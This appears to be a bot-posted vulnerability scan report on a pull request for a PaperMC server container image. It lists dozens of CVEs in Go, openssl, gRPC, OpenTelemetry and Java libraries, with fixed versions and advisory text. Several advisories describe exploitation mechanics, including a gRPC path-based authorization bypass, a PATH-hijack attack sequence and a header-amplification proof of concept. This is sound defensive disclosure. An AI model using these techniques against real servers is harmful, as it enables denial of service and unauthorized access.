org.objectweb.asm/asm 9.8
org.slf4j/jcl-over-slf4j 1.7.36
org.spongepowered.configurate.yaml/configurate-yaml 4.2.0
org.spongepowered.configurate/configurate-core 4.2.0
org.xerial/sqlite-jdbc 3.49.1.0
org.yaml/snakeyaml 2.2
reflection-rewriter-proxy-generator/reflection-rewriter-proxy-generator 0.0.3
reflection-rewriter-runtime/reflection-rewriter-runtime 0.0.3
reflection-rewriter/reflection-rewriter 0.0.3
spark-api/spark-api 0.1-20240720.200737-2
spark-paper/spark-paper 1.10.152
spec/spec 2.0.17
srgutils/srgutils 1.0.9
velocity-native/velocity-native 3.4.0-SNAPSHOT

@github-actions

github-actions Bot commented May 5, 2026

Copy link
Copy Markdown

🔍 Vulnerabilities of djaytan/papermc-server:test

📦 Image Reference djaytan/papermc-server:test
digestsha256:0f5f372484a22afed7ef08e101d9f9db9264054f6c83797a46360ad761a3c8a1
vulnerabilitiescritical: 3 high: 40 medium: 31 low: 4
platformlinux/amd64
size147 MB
packages176
📦 Base Image alpine:3
also known as
  • 3.23
  • 3.23.3
  • latest
digestsha256:59855d3dceb3ae53991193bd03301e082b2a7faa56a514b03527ae0ec2ce3a95
vulnerabilitiescritical: 1 high: 7 medium: 3 low: 1
critical: 1 high: 15 medium: 17 low: 1 stdlib 1.24.4 (golang)

pkg:golang/stdlib@1.24.4

critical : CVE--2025--68121

Affected range<1.24.13
Fixed version1.24.13
EPSS Score0.018%
EPSS Percentile5th percentile
Description

During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.

high : CVE--2026--42499

Affected range<1.25.10
Fixed version1.25.10
Description

Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322.

high : CVE--2026--39836

Affected range<1.25.10
Fixed version1.25.10
Description

The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0).

high : CVE--2026--39820

Affected range<1.25.10
Fixed version1.25.10
Description

Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations.

high : CVE--2026--33814

Affected range<1.25.10
Fixed version1.25.10
Description

When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.

high : CVE--2026--33811

Affected range<1.25.10
Fixed version1.25.10
Description

When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.

high : CVE--2026--32283

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.017%
EPSS Percentile4th percentile
Description

If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service.

This only affects TLS 1.3.

high : CVE--2026--32281

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.018%
EPSS Percentile5th percentile
Description

Validating certificate chains which use policies is unexpectedly inefficient when certificates in the chain contain a very large number of policy mappings, possibly causing denial of service.

This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.

high : CVE--2026--32280

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.017%
EPSS Percentile4th percentile
Description

During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls.

high : CVE--2026--25679

Affected range<1.25.8
Fixed version1.25.8
EPSS Score0.052%
EPSS Percentile16th percentile
Description

url.Parse insufficiently validated the host/authority component and accepted some invalid URLs.

high : CVE--2025--61729

Affected range<1.24.11
Fixed version1.24.11
EPSS Score0.012%
EPSS Percentile2nd percentile
Description

Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption.

high : CVE--2025--61726

Affected range<1.24.12
Fixed version1.24.12
EPSS Score0.034%
EPSS Percentile10th percentile
Description

The net/url package does not set a limit on the number of query parameters in a query.

While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse large URL-encoded forms. Parsing a large form containing many unique query parameters can cause excessive memory consumption.

high : CVE--2025--61725

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.040%
EPSS Percentile12th percentile
Description

The ParseAddress function constructs domain-literal address components through repeated string concatenation. When parsing large domain-literal components, this can cause excessive CPU consumption.

high : CVE--2025--61723

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.039%
EPSS Percentile12th percentile
Description

The processing time for parsing some invalid inputs scales non-linearly with respect to the size of the input.

This affects programs which parse untrusted PEM inputs.

high : CVE--2025--58188

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.009%
EPSS Percentile1st percentile
Description

Validating certificate chains which contain DSA public keys can cause programs to panic, due to a interface cast that assumes they implement the Equal method.

This affects programs which validate arbitrary certificate chains.

high : CVE--2025--58187

Affected range<1.24.9
Fixed version1.24.9
EPSS Score0.018%
EPSS Percentile5th percentile
Description

Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate.

This affects programs which validate arbitrary certificate chains.

medium : CVE--2025--61728

Affected range<1.24.12
Fixed version1.24.12
EPSS Score0.019%
EPSS Percentile5th percentile
Description

archive/zip uses a super-linear file name indexing algorithm that is invoked the first time a file in an archive is opened. This can lead to a denial of service when consuming a maliciously constructed ZIP archive.

medium : CVE--2025--61727

Affected range<1.24.11
Fixed version1.24.11
EPSS Score0.006%
EPSS Percentile0th percentile
Description

An excluded subdomain constraint in a certificate chain does not restrict the usage of wildcard SANs in the leaf certificate. For example a constraint that excludes the subdomain test.example.com does not prevent a leaf certificate from claiming the SAN *.example.com.

medium : CVE--2025--47906

Affected range>=1.24.0
<1.24.6
Fixed version1.24.6
EPSS Score0.030%
EPSS Percentile9th percentile
Description

If the PATH environment variable contains paths which are executables (rather than just directories), passing certain strings to LookPath ("", ".", and ".."), can result in the binaries listed in the PATH being unexpectedly returned.

medium : CVE--2026--32282

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.008%
EPSS Percentile1st percentile
Description

On Linux, if the target of Root.Chmod is replaced with a symlink while the chmod operation is in progress, Chmod can operate on the target of the symlink, even when the target lies outside the root.

The Linux fchmodat syscall silently ignores the AT_SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Root.Chmod checks its target before acting and returns an error if the target is a symlink lying outside the root, so the impact is limited to cases where the target is replaced with a symlink between the check and operation.

medium : CVE--2026--39826

Affected range<1.25.10
Fixed version1.25.10
Description

If a trusted template author were to write a <script> tag containing an empty 'type' attribute or a 'type' attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the <script> block.

medium : CVE--2026--39823

Affected range<1.25.10
Fixed version1.25.10
Description

CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a tag's attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the attribute, the escaper would fail to similarly escape it, leading to XSS.

medium : CVE--2026--32289

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.010%
EPSS Percentile1st percentile
Description

Context was not properly tracked across template branches for JS template literals, leading to possibly incorrect escaping of content when branches were used. Additionally template actions within JS template literals did not properly track the brace depth, leading to incorrect escaping being applied.

These issues could cause actions within JS template literals to be incorrectly or improperly escaped, leading to XSS vulnerabilities.

medium : CVE--2026--27142

Affected range<1.25.8
Fixed version1.25.8
EPSS Score0.011%
EPSS Percentile1st percentile
Description

Actions which insert URLs into the content attribute of HTML meta tags are not escaped. This can allow XSS if the meta tag also has an http-equiv attribute with the value "refresh".

A new GODEBUG setting has been added, htmlmetacontenturlescape, which can be used to disable escaping URLs in actions in the meta content attribute which follow "url=" by setting htmlmetacontenturlescape=0.

medium : CVE--2026--32288

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.004%
EPSS Percentile0th percentile
Description

tar.Reader can allocate an unbounded amount of memory when reading a maliciously-crafted archive containing a large number of sparse regions encoded in the "old GNU sparse map" format.

medium : CVE--2026--39825

Affected range<1.25.10
Fixed version1.25.10
Description

ReverseProxy can forward queries containing parameters not visible to Rewrite functions.

When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function.

For example, the query "a1=x&a2=x&...&a10000=x&hidden=y" can forward the parameter "hidden=y" while hiding it from the proxy's Rewrite function.

medium : CVE--2025--61730

Affected range<1.24.12
Fixed version1.24.12
EPSS Score0.009%
EPSS Percentile1st percentile
Description

During the TLS 1.3 handshake if multiple messages are sent in records that span encryption level boundaries (for instance the Client Hello and Encrypted Extensions messages), the subsequent messages may be processed before the encryption level changes. This can cause some minor information disclosure if a network-local attacker can inject messages during the handshake.

medium : CVE--2025--61724

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.021%
EPSS Percentile6th percentile
Description

The Reader.ReadResponse function constructs a response string through repeated string concatenation of lines. When the number of lines in a response is large, this can cause excessive CPU consumption.

medium : CVE--2025--58189

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.016%
EPSS Percentile3rd percentile
Description

When Conn.Handshake fails during ALPN negotiation the error contains attacker controlled information (the ALPN protocols sent by the client) which is not escaped.

medium : CVE--2025--58186

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.037%
EPSS Percentile11th percentile
Description

Despite HTTP headers having a default limit of 1MB, the number of cookies that can be parsed does not have a limit. By sending a lot of very small cookies such as "a=;", an attacker can make an HTTP server allocate a large amount of structs, causing large memory consumption.

medium : CVE--2025--58185

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.031%
EPSS Percentile9th percentile
Description

Parsing a maliciously crafted DER payload could allocate large amounts of memory, causing memory exhaustion.

medium : CVE--2025--47912

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.022%
EPSS Percentile6th percentile
Description

The Parse function permits values other than IPv6 addresses to be included in square brackets within the host component of a URL. RFC 3986 permits IPv6 addresses to be included within the host component, enclosed within square brackets. For example: "http://[::1]/". IPv4 addresses and hostnames must not appear within square brackets. Parse did not enforce this requirement.

medium : CVE--2025--58183

Affected range<1.24.8
Fixed version1.24.8
EPSS Score0.017%
EPSS Percentile4th percentile
Description

tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations.

low : CVE--2026--27139

Affected range<1.25.8
Fixed version1.25.8
EPSS Score0.007%
EPSS Percentile1st percentile
Description

On Unix platforms, when listing the contents of a directory using File.ReadDir or File.Readdir the returned FileInfo could reference a file outside of the Root in which the File was opened.

The impact of this escape is limited to reading metadata provided by lstat from arbitrary locations on the filesystem without permitting reading or writing files outside the root.

critical: 1 high: 6 medium: 0 low: 0 openssl 3.5.5-r0 (apk)

pkg:apk/alpine/openssl@3.5.5-r0?os_name=alpine&os_version=3.23

critical : CVE--2026--31789

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.026%
EPSS Percentile7th percentile
Description

high : CVE--2026--28387

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.042%
EPSS Percentile13th percentile
Description

high : CVE--2026--31790

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.017%
EPSS Percentile4th percentile
Description

high : CVE--2026--28390

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.040%
EPSS Percentile12th percentile
Description

high : CVE--2026--28389

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.040%
EPSS Percentile12th percentile
Description

high : CVE--2026--28388

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.021%
EPSS Percentile6th percentile
Description

high : CVE--2026--2673

Affected range<3.5.6-r0
Fixed version3.5.6-r0
EPSS Score0.017%
EPSS Percentile4th percentile
Description
critical: 1 high: 0 medium: 0 low: 0 google.golang.org/grpc 1.78.0 (golang)

pkg:golang/google.golang.org/grpc@1.78.0

critical 9.1: CVE--2026--33186 Improper Authorization

Affected range<1.79.3
Fixed version1.79.3
CVSS Score9.1
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS Score0.020%
EPSS Percentile5th percentile
Description

Impact

What kind of vulnerability is it? Who is impacted?

It is an Authorization Bypass resulting from Improper Input Validation of the HTTP/2 :path pseudo-header.

The gRPC-Go server was too lenient in its routing logic, accepting requests where the :path omitted the mandatory leading slash (e.g., Service/Method instead of /Service/Method). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official grpc/authz package) evaluated the raw, non-canonical path string. Consequently, "deny" rules defined using canonical paths (starting with /) failed to match the incoming request, allowing it to bypass the policy if a fallback "allow" rule was present.

Who is impacted?
This affects gRPC-Go servers that meet both of the following criteria:

  1. They use path-based authorization interceptors, such as the official RBAC implementation in google.golang.org/grpc/authz or custom interceptors relying on info.FullMethod or grpc.Method(ctx).
  2. Their security policy contains specific "deny" rules for canonical paths but allows other requests by default (a fallback "allow" rule).

The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed :path headers directly to the gRPC server.

Patches

Has the problem been patched? What versions should users upgrade to?

Yes, the issue has been patched. The fix ensures that any request with a :path that does not start with a leading slash is immediately rejected with a codes.Unimplemented error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string.

Users should upgrade to the following versions (or newer):

  • v1.79.3
  • The latest master branch.

It is recommended that all users employing path-based authorization (especially grpc/authz) upgrade as soon as the patch is available in a tagged release.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods:

1. Use a Validating Interceptor (Recommended Mitigation)

Add an "outermost" interceptor to your server that validates the path before any other authorization logic runs:

func pathValidationInterceptor(ctx context.Context, req any, info *grpc.UnaryServerInfo, handler grpc.UnaryHandler) (any, error) {
    if info.FullMethod == "" || info.FullMethod[0] != '/' {
        return nil, status.Errorf(codes.Unimplemented, "malformed method name")
    }   
    return handler(ctx, req)
}

// Ensure this is the FIRST interceptor in your chain
s := grpc.NewServer(
    grpc.ChainUnaryInterceptor(pathValidationInterceptor, authzInterceptor),
)

2. Infrastructure-Level Normalization

If your gRPC server is behind a reverse proxy or load balancer (such as Envoy, NGINX, or an L7 Cloud Load Balancer), ensure it is configured to enforce strict HTTP/2 compliance for pseudo-headers and reject or normalize requests where the :path header does not start with a leading slash.

3. Policy Hardening

Switch to a "default deny" posture in your authorization policies (explicitly listing all allowed paths and denying everything else) to reduce the risk of bypasses via malformed inputs.

critical: 0 high: 9 medium: 7 low: 1 stdlib 1.25.7 (golang)

pkg:golang/stdlib@1.25.7

high : CVE--2026--42499

Affected range<1.25.10
Fixed version1.25.10
Description

Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322.

high : CVE--2026--39836

Affected range<1.25.10
Fixed version1.25.10
Description

The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0).

high : CVE--2026--39820

Affected range<1.25.10
Fixed version1.25.10
Description

Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations.

high : CVE--2026--33814

Affected range<1.25.10
Fixed version1.25.10
Description

When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.

high : CVE--2026--33811

Affected range<1.25.10
Fixed version1.25.10
Description

When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.

high : CVE--2026--32283

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.017%
EPSS Percentile4th percentile
Description

If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service.

This only affects TLS 1.3.

high : CVE--2026--32281

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.018%
EPSS Percentile5th percentile
Description

Validating certificate chains which use policies is unexpectedly inefficient when certificates in the chain contain a very large number of policy mappings, possibly causing denial of service.

This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.

high : CVE--2026--32280

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.017%
EPSS Percentile4th percentile
Description

During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls.

high : CVE--2026--25679

Affected range<1.25.8
Fixed version1.25.8
EPSS Score0.052%
EPSS Percentile16th percentile
Description

url.Parse insufficiently validated the host/authority component and accepted some invalid URLs.

medium : CVE--2026--32282

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.008%
EPSS Percentile1st percentile
Description

On Linux, if the target of Root.Chmod is replaced with a symlink while the chmod operation is in progress, Chmod can operate on the target of the symlink, even when the target lies outside the root.

The Linux fchmodat syscall silently ignores the AT_SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Root.Chmod checks its target before acting and returns an error if the target is a symlink lying outside the root, so the impact is limited to cases where the target is replaced with a symlink between the check and operation.

medium : CVE--2026--39826

Affected range<1.25.10
Fixed version1.25.10
Description

If a trusted template author were to write a <script> tag containing an empty 'type' attribute or a 'type' attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the <script> block.

medium : CVE--2026--39823

Affected range<1.25.10
Fixed version1.25.10
Description

CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a tag's attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the attribute, the escaper would fail to similarly escape it, leading to XSS.

medium : CVE--2026--32289

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.010%
EPSS Percentile1st percentile
Description

Context was not properly tracked across template branches for JS template literals, leading to possibly incorrect escaping of content when branches were used. Additionally template actions within JS template literals did not properly track the brace depth, leading to incorrect escaping being applied.

These issues could cause actions within JS template literals to be incorrectly or improperly escaped, leading to XSS vulnerabilities.

medium : CVE--2026--27142

Affected range<1.25.8
Fixed version1.25.8
EPSS Score0.011%
EPSS Percentile1st percentile
Description

Actions which insert URLs into the content attribute of HTML meta tags are not escaped. This can allow XSS if the meta tag also has an http-equiv attribute with the value "refresh".

A new GODEBUG setting has been added, htmlmetacontenturlescape, which can be used to disable escaping URLs in actions in the meta content attribute which follow "url=" by setting htmlmetacontenturlescape=0.

medium : CVE--2026--32288

Affected range<1.25.9
Fixed version1.25.9
EPSS Score0.004%
EPSS Percentile0th percentile
Description

tar.Reader can allocate an unbounded amount of memory when reading a maliciously-crafted archive containing a large number of sparse regions encoded in the "old GNU sparse map" format.

medium : CVE--2026--39825

Affected range<1.25.10
Fixed version1.25.10
Description

ReverseProxy can forward queries containing parameters not visible to Rewrite functions.

When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function.

For example, the query "a1=x&a2=x&...&a10000=x&hidden=y" can forward the parameter "hidden=y" while hiding it from the proxy's Rewrite function.

low : CVE--2026--27139

Affected range<1.25.8
Fixed version1.25.8
EPSS Score0.007%
EPSS Percentile1st percentile
Description

On Unix platforms, when listing the contents of a directory using File.ReadDir or File.Readdir the returned FileInfo could reference a file outside of the Root in which the File was opened.

The impact of this escape is limited to reading metadata provided by lstat from arbitrary locations on the filesystem without permitting reading or writing files outside the root.

critical: 0 high: 4 medium: 1 low: 0 org.apache.commons/commons-compress 1.5 (maven)

pkg:maven/org.apache.commons/commons-compress@1.5

high 7.5: CVE--2021--36090 Improper Handling of Length Parameter Inconsistency

Affected range<1.21
Fixed version1.21
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.736%
EPSS Percentile73rd percentile
Description

When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.

high 7.5: CVE--2021--35517 Improper Handling of Length Parameter Inconsistency

Affected range<1.21
Fixed version1.21
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score1.319%
EPSS Percentile80th percentile
Description

When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.

high 7.5: CVE--2021--35516 Improper Handling of Length Parameter Inconsistency

Affected range<1.21
Fixed version1.21
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score1.740%
EPSS Percentile83rd percentile
Description

When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.

high 7.5: CVE--2021--35515 Excessive Iteration

Affected range<1.21
Fixed version1.21
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score1.191%
EPSS Percentile79th percentile
Description

When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.

medium 5.9: CVE--2024--25710 Loop with Unreachable Exit Condition ('Infinite Loop')

Affected range>=1.3
<1.26.0
Fixed version1.26.0
CVSS Score5.9
CVSS VectorCVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H
EPSS Score0.018%
EPSS Percentile5th percentile
Description

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.3 through 1.25.0.

Users are recommended to upgrade to version 1.26.0 which fixes the issue.

critical: 0 high: 1 medium: 2 low: 0 golang.org/x/net 0.39.0 (golang)

pkg:golang/golang.org/x/net@0.39.0

high : CVE--2026--33814

Affected range<0.53.0
Fixed version0.53.0
Description

When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.

medium : CVE--2025--58190

Affected range<0.45.0
Fixed version0.45.0
EPSS Score0.011%
EPSS Percentile1st percentile
Description

The html.Parse function in golang.org/x/net/html has an infinite parsing loop when processing certain inputs, which can lead to denial of service (DoS) if an attacker provides specially crafted HTML content.

medium : CVE--2025--47911

Affected range<0.45.0
Fixed version0.45.0
EPSS Score0.017%
EPSS Percentile4th percentile
Description

The html.Parse function in golang.org/x/net/html has quadratic parsing complexity when processing certain inputs, which can lead to denial of service (DoS) if an attacker provides specially crafted HTML content.

critical: 0 high: 1 medium: 1 low: 0 musl 1.2.5-r21 (apk)

pkg:apk/alpine/musl@1.2.5-r21?os_name=alpine&os_version=3.23

high : CVE--2026--40200

Affected range<1.2.5-r23
Fixed version1.2.5-r23
EPSS Score0.018%
EPSS Percentile5th percentile
Description

medium : CVE--2026--6042

Affected range<1.2.5-r22
Fixed version1.2.5-r22
EPSS Score0.014%
EPSS Percentile3rd percentile
Description
critical: 0 high: 1 medium: 0 low: 0 golang.org/x/net 0.49.0 (golang)

pkg:golang/golang.org/x/net@0.49.0

high : CVE--2026--33814

Affected range<0.53.0
Fixed version0.53.0
Description

When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.

critical: 0 high: 1 medium: 0 low: 0 org.codehaus.plexus/plexus-utils 3.5.1 (maven)

pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1

high : CVE--2025--67030 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<3.6.1
Fixed version4.0.3
EPSS Score0.273%
EPSS Percentile51st percentile
Description

Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code

critical: 0 high: 1 medium: 0 low: 0 go.opentelemetry.io/otel/sdk 1.40.0 (golang)

pkg:golang/go.opentelemetry.io/otel/sdk@1.40.0

high 7.3: CVE--2026--39883 Untrusted Search Path

Affected range>=1.15.0
<=1.42.0
Fixed version1.43.0
CVSS Score7.3
CVSS VectorCVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS Score0.008%
EPSS Percentile1st percentile
Description

Summary

The fix for GHSA-9h8m-3fm2-qjrq (CVE-2026-24051) changed the Darwin ioreg command to use an absolute path but left the BSD kenv command using a bare name, allowing the same PATH hijacking attack on BSD and Solaris platforms.

Root Cause

sdk/resource/host_id.go line 42:

if result, err := r.execCommand("kenv", "-q", "smbios.system.uuid"); err == nil {

Compare with the fixed Darwin path at line 58:

result, err := r.execCommand("/usr/sbin/ioreg", "-rd1", "-c", "IOPlatformExpertDevice")

The execCommand helper at sdk/resource/host_id_exec.go uses exec.Command(name, arg...) which searches $PATH when the command name contains no path separator.

Affected platforms (per build tag in host_id_bsd.go:4): DragonFly BSD, FreeBSD, NetBSD, OpenBSD, Solaris.

The kenv path is reached when /etc/hostid does not exist (line 38-40), which is common on FreeBSD systems.

Attack

  1. Attacker has local access to a system running a Go application that imports go.opentelemetry.io/otel/sdk
  2. Attacker places a malicious kenv binary earlier in $PATH
  3. Application initializes OpenTelemetry resource detection at startup
  4. hostIDReaderBSD.read() calls exec.Command("kenv", ...) which resolves to the malicious binary
  5. Arbitrary code executes in the context of the application

Same attack vector and impact as CVE-2026-24051.

Suggested Fix

Use the absolute path:

if result, err := r.execCommand("/bin/kenv", "-q", "smbios.system.uuid"); err == nil {

On FreeBSD, kenv is located at /bin/kenv.

critical: 0 high: 1 medium: 0 low: 0 go.opentelemetry.io/otel 1.40.0 (golang)

pkg:golang/go.opentelemetry.io/otel@1.40.0

high 7.5: CVE--2026--29181 Uncontrolled Resource Consumption

Affected range>=1.36.0
<=1.40.0
Fixed version1.41.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.052%
EPSS Percentile16th percentile
Description

multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. this allows an attacker to amplify cpu and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit.

severity

HIGH (availability / remote request amplification)

relevant links

vulnerability details

pins: open-telemetry/opentelemetry-go@1ee4a41
as-of: 2026-02-04
policy: direct (no program scope provided)

callsite: propagation/baggage.go:58 (extractMultiBaggage)
attacker control: inbound HTTP request headers (many baggage field-values) → propagation.HeaderCarrier.Values("baggage") → repeated baggage.Parse + member aggregation

root cause

extractMultiBaggage iterates over all baggage header field-values and parses each one independently, then appends members into a shared slice. the 8192-byte parsing cap applies per header value, but the multi-value path repeats that work once per header line (bounded only by the server/proxy header byte limit).

impact

in a default net/http configuration (max header bytes 1mb), a single request with many baggage: header field-values can cause large per-request allocations and increased latency.

example from the attached PoC harness (darwin/arm64; 80 values; 40 requests):

  • canonical: per_req_alloc_bytes=10315458 and p95_ms=7
  • control: per_req_alloc_bytes=133429 and p95_ms=0

proof of concept

canonical:

mkdir -p poc
unzip poc.zip -d poc
cd poc
make test

output (excerpt):

[CALLSITE_HIT]: propagation/baggage.go:58 extractMultiBaggage
[PROOF_MARKER]: baggage_multi_value_amplification p95_ms=7 per_req_alloc_bytes=10315458 per_req_allocs=16165

control:

cd poc
make control

control output (excerpt):

[NC_MARKER]: baggage_single_value_baseline p95_ms=0 per_req_alloc_bytes=133429 per_req_allocs=480

expected: multiple baggage header field-values should be semantically equivalent to a single comma-joined baggage value and should not multiply parsing/alloc work within the effective header byte budget.
actual: multiple baggage header field-values trigger repeated parsing and member aggregation, causing high per-request allocations and increased latency even when each individual value is within 8192 bytes.

fix recommendation

avoid repeated parsing across multi-values by enforcing a global budget and/or normalizing multi-values into a single value before parsing. one mitigation approach is to treat multi-values as a single comma-joined string and cap total parsed bytes (for example 8192 bytes total).

fix accepted when: under the default PoC harness settings, canonical stays within 2x of control for per_req_alloc_bytes and per_req_allocs, and p95_ms stays below 2ms.

poc.zip
PR_DESCRIPTION.md

critical: 0 high: 0 medium: 1 low: 1 zlib 1.3.1-r2 (apk)

pkg:apk/alpine/zlib@1.3.1-r2?os_name=alpine&os_version=3.23

medium : CVE--2026--22184

Affected range<1.3.2-r0
Fixed version1.3.2-r0
EPSS Score0.006%
EPSS Percentile0th percentile
Description

low : CVE--2026--27171

Affected range<1.3.2-r0
Fixed version1.3.2-r0
EPSS Score0.009%
EPSS Percentile1st percentile
Description
critical: 0 high: 0 medium: 1 low: 0 commons-lang/commons-lang 2.6 (maven)

pkg:maven/commons-lang/commons-lang@2.6

medium 6.5: CVE--2025--48924 Uncontrolled Recursion

Affected range>=2.0
<=2.6
Fixed versionNot Fixed
CVSS Score6.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
EPSS Score0.135%
EPSS Percentile33rd percentile
